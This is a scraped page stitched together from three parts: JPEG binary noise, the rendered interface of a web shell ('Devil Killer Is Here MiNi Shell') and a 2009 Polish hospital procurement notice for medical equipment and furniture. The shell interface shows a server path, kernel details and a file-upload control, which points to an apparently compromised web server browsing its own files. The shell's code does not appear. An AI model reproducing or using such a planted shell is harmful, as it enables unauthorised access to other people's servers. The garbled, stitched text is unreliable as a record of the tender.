JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090527/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090527/169924-N-2009.html

<p class="kh_header"><b>Szczecin: DOSTAWA WYPOSAŻENIA MEDYCZNEGO, WYKONANIE I DOSTAWA MEBLI W SYSTEMIE STELAŻA METALOWEGO, MEBLI STANDARDOWYCH I POD ZABUDOWĘ, SPRZĘTU KOMPUTEROWEGO ORAZ POZOSTAŁEGO WYPOSAŻENIA NA POTRZEBY ODDZIAŁU PSYCHIATRYCZNEGO, REHABILITACYJNEGO ORAZ PORADNI ZDROWIA PSYCHICZNEGO SPSZOZ Zdroje W PAKIETACH</b><br>
<b>Numer ogłoszenia: 169924 - 2009; data zamieszczenia: 27.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Specjalistyczny Zakład Opieki Zdrowotnej "ZDROJE" , ul. Mączna 4, 70-780 Szczecin, woj. zachodniopomorskie, tel. 091 8806260, faks 091 8806203.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-zdroje.szczecin.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA WYPOSAŻENIA MEDYCZNEGO, WYKONANIE I DOSTAWA MEBLI W SYSTEMIE STELAŻA METALOWEGO, MEBLI STANDARDOWYCH I POD ZABUDOWĘ, SPRZĘTU KOMPUTEROWEGO ORAZ POZOSTAŁEGO WYPOSAŻENIA NA POTRZEBY ODDZIAŁU PSYCHIATRYCZNEGO, REHABILITACYJNEGO ORAZ PORADNI ZDROWIA PSYCHICZNEGO SPSZOZ Zdroje W PAKIETACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawę wyposażenia medycznego, wykonanie i dostawę mebli w systemie stelaża metalowego, mebli standardowych i pod zabudowę, sprzętu komputerowego oraz pozostałego wyposażenia na potrzeby oddziału psychiatrycznego rehabilitacyjnego oraz poradni zdrowia psychicznego SPSZOZ Zdroje w pakietach:
Pakiet nr 1.1 - Łóżko szpitalne z wyposażeniem i bez wyposażenia
Pakiet nr 1.2 - Szafki przyłóżkowe bez blaty bocznego - 64 sztuki
Pakiet nr 1.3 - Wózki
Pakiet nr 1.4 - Pozostałe wyposażenie
Pakiet nr 1.5 - Stół zabiegowy z wyposażeniem - 1 sztuka
Pakiet nr 1.6 - Lampy medyczne
Pakiet nr 1.7 - Wózki szpitalne
Pakiet nr 1.8 - Waga ze wzrostomierzem - 2sztuk
Pakiet nr 1.9 - Materac przeciwodleżynowy trzysekcyjny z pompą do opieki specjalistycznej - 1 sztuka
Pakiet nr 1.10 - Meble ze stali kwasoodpornej i nierdzewnej
Pakiet nr 1.11 - Meble medyczne w systemie stelaża metalowego
Pakiet nr 1.12 - Meble standardowe i pod zabudowę
Pakiet nr 1.13 - Metalowe szafy szatniowe
Pakiet nr 1.14 - Dozowniki oraz pozostałe wyposażenie
Pakiet nr 1.15 - Pościel
Pakiet nr 1.16 - System pasów do całkowitego unieruchomienia osób agresywnych i pobudzonych
Pakiet nr 1.17 - Aparat Ambu silikonowy - 2 sztuki
Pakiet nr 1.18 - Macerator - 2 sztuki
Pakiet nr 1.19 - Bieżnia - 1 sztuka
Pakiet nr 1.20 - Ciśnieniomierz naramienny elektryczny - 10 sztuk
Pakiet nr 1.21 - APARAT EKG 12 - kanałowy - szt. 1
Pakiet nr 1.22 - Ssak elektryczny przenośny - 2sztuki
Pakiet nr 1.23 - Zestaw komputerowy z monitorem
Pakiet nr 1.24 - Laserowe urządzenie wielofunkcyjne A4 - mono
Pakiet nr 1.25 - Niszczarki do dokumentów
Pakiet nr 1.26 - Drukarka komputerowa laserowa - mono sieciowa
Pakiet nr 1.27 - Wyposażenie medyczne dla Poradni Zdrowia Psychicznego
Pakiet nr 1.28 - Waga ze wzrostomierzem - 2sztuk dla Poradni Zdrowia Psychicznego
Pakiet nr 1.29 - Dozowniki oraz pozostałe wyposażenie dla Poradni Zdrowia Psychicznego
Pakiet nr 1.30 - Meble standardowe i pod zabudowę dla Poradni Zdrowia Psychicznego.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.18.00.00-8, 39.10.00.00-3, 39.14.31.12-4, 39.29.00.00-0, 30.20.00.00-1, 30.23.21.10-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 30.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium należy wnieść w wysokości:
l
1.Pakiet nr 1.1 - Łóżko szpitalne z wyposażeniem i bez wyposażenia - 5 517,60 zł
2.Pakiet nr 1.2 - Szafki przyłóżkowe bez blaty bocznego - 64 sztuki - 1 516,80 zł
3.Pakiet nr 1.3 - Wózki - 217,35 zł
4.Pakiet nr 1.4 - Pozostałe wyposażenie - 298,25 zł
5.Pakiet nr 1.5 - Stół zabiegowy z wyposażeniem - 1 sztuka - 165,00 zł
6.Pakiet nr 1.6	Lampy medyczne - 526,43 zł
7.Pakiet nr 1.7	Wózki szpitalne - 167,10 zł
8.Pakiet nr 1.8	Waga ze wzrostomierzem - 2sztuk - 70,80 zł
9.Pakiet nr 1.9	Materac przeciwodleżynowy trzysekcyjny z pompą do opieki specjalistycznej - 1 sztuka - 144,45 zł
10.Pakiet nr 1.10	Meble ze stali kwasoodpornej i nierdzewnej - 981,42 zł
11.Pakiet nr 1.11	Meble medyczne w systemie stelaża metalowego - 2 308,50 zł
12.Pakiet nr 1.12	Meble standardowe i pod zabudowę - 3 710,40 zł
13.Pakiet nr 1.13	Metalowe szafy szatniowe - 294,00 zł
14.Pakiet nr 1.14	Dozowniki oraz pozostałe wyposażenie	- 955,08 zł
15.Pakiet nr 1.15	Pościel - 1 018,50 zł
16.Pakiet nr 1.16	System pasów do całkowitego unieruchomienia osób agresywnych i pobudzonych - 256,20 zł
17.Pakiet nr 1.17	Aparat Ambu silikonowy - 2 sztuki - 16,07 zł
18.Pakiet nr 1.18	Macerator - 2 sztuki - 900,00 zł
19.Pakiet nr 1.19	Bieżnia - 1 sztuka - 105,00 zł
20.Pakiet nr 1.20	Ciśnieniomierz naramienny elektryczny - 10 sztuk - 93,60 zł
21.Pakiet nr 1.21	APARAT EKG 12 - kanałowy - szt. 1 - 210,00 zł
22.Pakiet nr 1.22	Ssak elektryczny przenośny - 2sztuki - 52,14 zł
23.Pakiet nr 1.23	Zestaw komputerowy z monitorem - 2 426,58 zł
24.Pakiet nr 1.24	Laserowe urządzenie wielofunkcyjne A4 - mono - 270,00 zł
25.Pakiet nr 1.25	Niszczarki do dokumentów - 148,60 zł
26.Pakiet nr 1.26	Drukarka komputerowa laserowa - mono sieciowa - 323,91 zł
27.Pakiet nr 1.27	Wyposażenie medyczne dla Poradni Zdrowia Psychicznego - 81,00 zł
28.Pakiet nr 1.28	Waga ze wzrostomierzem - 2sztuk dla Poradni Zdrowia Psychicznego - 70,80 zł
29.Pakiet nr 1.29	Dozowniki oraz pozostałe wyposażenie dla Poradni Zdrowia Psychicznego - 162,90 zł
30.Pakiet nr 1.30	Meble standardowe i pod zabudowę dla Poradni Zdrowia Psychicznego - 507,75 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	W postępowaniu mogą wziąć udział wykonawcy spełniający warunki określone w pkt 2 - 3 którzy złożą wymagane oświadczenia i dokumenty.
2.	O udzielenie zamówienia ubiegać się mogą:
1)	wykonawcy, wobec których nie została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie 3 lat przed wszczęciem postępowania szkoda za to, że w ciągu ostatnich trzech lat przed wszczęciem postępowania wyrządzili szkodę niewykonując zamówienia lub wykonując je nienależycie, 
Celem potwierdzenia spełnienia warunku wykonawca zobowiązany jest złożyć pisemne oświadczenie na zał. nr 2.
2)	wykonawcy w stosunku do których nie otwarto likwidacji lub których upadłości nie ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego;
Celem potwierdzenia spełnienia warunku wykonawca zobowiązany jest złożyć pisemne oświadczenie na zał. nr 2.
3)	wykonawcy, którzy nie zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
Celem potwierdzenia spełnienia warunku wykonawca zobowiązany jest złożyć pisemne oświadczenie na zał. nr 2.
4)	osoby fizyczne, które nie zostały prawomocnie skazane za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
5)	spółki jawne, których wspólnika prawomocnie nie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
6)	spółki partnerskie, których partnera lub członka zarządu prawomocnie nie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
7)	spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie nie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
8)	osoby prawne, których urzędującego członka organu zarządzającego prawomocnie nie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
Celem potwierdzenia spełnienia warunku, o którym mowa w ppkt 4) - 8) wykonawca zobowiązany jest złożyć pisemne oświadczenie na zał. nr 2.
9)	podmioty zbiorowe, wobec których sąd nie orzekł zakazu ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
Celem potwierdzenia spełnienia warunku wykonawca zobowiązany jest złożyć pisemne oświadczenie na zał. nr 2.
10)	wykonawcy, którzy posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
Celem potwierdzenia spełnienia warunku wykonawca zobowiązany jest złożyć następujące dokumenty: 
a)	pisemne oświadczenie na załączniku nr 2;
b)	aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
11)	wykonawcy, którzy posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
Celem potwierdzenia spełnienia warunku wykonawca zobowiązany jest złożyć następujące dokumenty: 
a)	pisemne oświadczenie na załączniku nr 2;
b)	załącznik nr 3 wykaz wykonanych, co najmniej dwóch dostaw produktów odpowiadających rodzajem i wartością przedmiotowi zamówienia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców.
c)	Dokumenty potwierdzające, że te dostawy wymienione w załączniku nr 3 zostały wykonane należycie;
Wartość jednej dostawy przedstawionej przez Wykonawcę w załączniku nr 3 powinna być równa, co najmniej cenie przedstawionej w ofercie. W przypadku , gdy wskazywana dostawa ma charakter kompleksowy i tylko pewna jej część stanowi dostawę produktów odpowiadających rodzajem i wartością przedmiotowi zamówienia w załączniku nr 3 należy wyszczególnić tą dostawę i osobno podać jej wartość.
12)	wykonawcy, którzy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
Celem potwierdzenia spełnienia warunku wykonawca zobowiązany jest złożyć pisemne oświadczenie na zał. nr 2.
13)	wykonawcy, którzy nie wykonywali bezpośrednio czynności związanych z przygotowaniem prowadzonego postępowania lub nie posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba, że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji;
Celem potwierdzenia spełnienia warunku wykonawca zobowiązany jest złożyć pisemne oświadczenie na zał. nr 2.
3.	Celem potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego wykonawca zobowiązany jest dołączyć do oferty. 
a)	oświadczenie na załączniku nr 4, że oferowane produkty spełniają wszystkie parametry, wymagania i charakterystyki wymienione w specyfikacji istotnych warunków zamówienia i właściwych przepisach prawa;
b)	aktualny dokument dopuszczający do obrotu (tj. atesty, świadectwo, certyfikat EC wydany przez jednostkę notyfikowaną, deklaracja zgodności CE; wpis lub zgłoszenie do Rejestru wyrobu medycznego oznaczonego znakiem zgodności CE).
c)	Szczegółowa charakterystyka oferowanego produktu (katalog lub folder) - zawierająca nazwę produktu nazwę producenta, charakterystykę oraz oryginalne katalogi ze zdjęciami (foldery) wydane przez producenta uwzględniające parametry techniczne, czyli tzw. technical data zaoferowanego produktu. W przypadku, gdy oryginalny katalog producenta jest w innym języku niż język polski prosimy o dołączenie tłumaczenia folderu oferowanego produktu. W przypadku, gdyby załączone do oferty katalogi (foldery) nie prezentowały identycznego produktu jak oferowany w załączniku Oferta cenowa (od nr 1.1 do nr 1.22 oraz od nr 1.27 do 1.30) lub nie uwzględniały wszystkich wymaganych przez Zamawiającego w tym załączniku parametrów należy te rozbieżności wskazać i oświadczyć, że zaoferowany produkt spełnia wymogi określone w SIWZ. W przypadku gdyby rozbieżności dotyczyły elementów np. konstrukcji przedmiotu Zamawiający wymaga oświadczenia producenta o możliwości wykonania przedmiotu w sposób zgodny z SIWZ. Zamawiający zastrzega sobie prawo do sprawdzania wiarygodności podanych przez Wykonawcę parametrów technicznych we wszystkich dostępnych źródłach
d)	W zakresie Pakietu nr 1.15 Do oferty należy dołączyć kartę technologiczną tkaniny na oferowane produkty.

4.	Zamawiający wezwie na podstawie art. 26 ust. 3 wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert. 

5.	O udzielenie zamówienia ubiegać się mogą wykonawcy, którzy oprócz warunków wymienionych w rozdziale VI pkt 2-3 SIWZ spełniają także następujące warunki dodatkowe:
1)	wniosą wadium zgodnie z zasadami określonymi:
Celem potwierdzenia spełnienia warunku wykonawca zobowiązany jest dołączyć dowód wniesienia wadium, w jednej z następujących form tj.:
a)	kopia dokonania przelewu na konto zamawiającego,
b)	oryginał ( w oddzielnej kopercie) i załączoną do oferty kopię gwarancji bankowej,
c)	oryginał ( w oddzielnej kopercie) i załączoną do oferty kopię gwarancji ubezpieczeniowej,
d)	oryginał ( w oddzielnej kopercie) i załączoną do oferty kopię umowy poręczenia
6.	Wykonawcy, którzy nie spełnią warunków określonych rozdziale VI pkt 2 -5 SIWZ zostaną wykluczeni z postępowania zgodnie z art. 24 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> pisemne oświadczenie na załączniku nr 2, aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, załącznik nr 3 wykaz wykonanych, co najmniej dwóch dostaw produktów odpowiadających rodzajem i wartością przedmiotowi zamówienia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, Dokumenty potwierdzające, że te dostawy wymienione w załączniku nr 3 zostały wykonane należycie;
Wartość jednej dostawy przedstawionej przez Wykonawcę w załączniku nr 3 powinna być równa, co najmniej cenie przedstawionej w ofercie. W przypadku , gdy wskazywana dostawa ma charakter kompleksowy i tylko pewna jej część stanowi dostawę produktów odpowiadających rodzajem i wartością przedmiotowi zamówienia w załączniku nr 3 należy wyszczególnić tą dostawę i osobno podać jej wartość, oświadczenie na załączniku nr 4, że oferowane produkty spełniają wszystkie parametry, wymagania i charakterystyki wymienione w specyfikacji istotnych warunków zamówienia i właściwych przepisach prawa, aktualny dokument dopuszczający do obrotu (tj. atesty, świadectwo, certyfikat EC wydany przez jednostkę notyfikowaną, deklaracja zgodności CE; wpis lub zgłoszenie do Rejestru wyrobu medycznego oznaczonego znakiem zgodności CE),	Szczegółowa charakterystyka oferowanego produktu (katalog lub folder) - zawierająca nazwę produktu nazwę producenta, charakterystykę oraz oryginalne katalogi ze zdjęciami (foldery) wydane przez producenta uwzględniające parametry techniczne, czyli tzw. technical data zaoferowanego produktu. W przypadku, gdy oryginalny katalog producenta jest w innym języku niż język polski prosimy o dołączenie tłumaczenia folderu oferowanego produktu. W przypadku, gdyby załączone do oferty katalogi (foldery) nie prezentowały identycznego produktu jak oferowany w załączniku Oferta cenowa (od nr 1.1 do nr 1.22 oraz od nr 1.27 do 1.30) lub nie uwzględniały wszystkich wymaganych przez Zamawiającego w tym załączniku parametrów należy te rozbieżności wskazać i oświadczyć, że zaoferowany produkt spełnia wymogi określone w SIWZ. W przypadku gdyby rozbieżności dotyczyły elementów np. konstrukcji przedmiotu Zamawiający wymaga oświadczenia producenta o możliwości wykonania przedmiotu w sposób zgodny z SIWZ. Zamawiający zastrzega sobie prawo do sprawdzania wiarygodności podanych przez Wykonawcę parametrów technicznych we wszystkich dostępnych źródłach,	W zakresie Pakietu nr 1.15 Do oferty należy dołączyć kartę technologiczną tkaniny na oferowane produkty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital-Zdroje.szczecin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SPSZOZ Zdroje, ul. Mączna 4, 70-780 Szczecin, Budynek Administracji, Dział Organizacyjno-Prawny od pn - pt w godz. 8:00 - 14:30.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2009 godzina 10:00, miejsce: SPSZOZ Zdroje, ul. Mączna 4 70- 780 Szczecin, Blok 2F, Kancelaria od poniedz. do piątku w godz. 7:25 - 15:00.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.1 Łóżko szpitalne z wyposażeniem i bez wyposażenia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.1 Łóżko szpitalne z wyposażeniem i bez wyposażenia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 1.2 Szafki przyłóżkowe bez blaty bocznego - 64 sztuki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1.2 Szafki przyłóżkowe bez blaty bocznego - 64 sztuki.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 1.3 Wózki.</p>
